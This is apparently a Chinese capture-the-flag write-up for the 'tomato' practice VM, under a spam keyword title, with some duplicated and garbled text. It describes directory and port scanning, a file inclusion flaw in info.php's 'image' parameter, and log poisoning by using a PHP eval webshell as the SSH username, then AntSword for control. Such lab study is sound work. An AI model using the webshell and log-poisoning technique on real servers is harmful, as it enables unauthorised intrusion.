网站建设分工说明,项目网站制作,app商城软件,办公空间设计网站tomato-靶机
一、安装靶机环境
下载双击.ova文件#xff0c;写文件名路径导入 打开虚拟机用NAT模式 编辑–虚拟网络编辑器查看IP段 二、信息收集
1.御剑端口扫描查找该虚拟机的IP 访问网站 扫目录
dirb http://192.168.30.130 收集到目录
/server-status
/antibot_im…tomato-靶机
一、安装靶机环境
下载双击.ova文件写文件名路径导入 打开虚拟机用NAT模式 编辑–虚拟网络编辑器查看IP段 二、信息收集
1.御剑端口扫描查找该虚拟机的IP 访问网站 扫目录
dirb http://192.168.30.130 收集到目录
/server-status
/antibot_image/
/index.html访问/antibot_image目录 在目录下找到info.php 查到
根目录/var/www/html
用户名:webmasterlocalhost查看info.php源代码提示image参数用于文件包含 三、漏洞渗透
写image参数linux的系统文件发现成功显示确定有文件包含漏洞 2.发现端口没有全部扫描出来使用这个命令扫描
nmap -A 192.168.30.130 -p-2211是ssl的连接端口
ssh ?php eval($_POST[cmd]);?192.168.30.130 -p 2211然后在网页端查看ubuntu报错信息/var/log/auth.log
http://192.168.30.130/antibot_image/antibots/info.php?image/var/log/auth.log看到注入成功然后用蚁剑
URL地址
http://192.168.30.130/antibot_image/antibots/info.php?image/var/log/auth.log然后就可以控制整个文件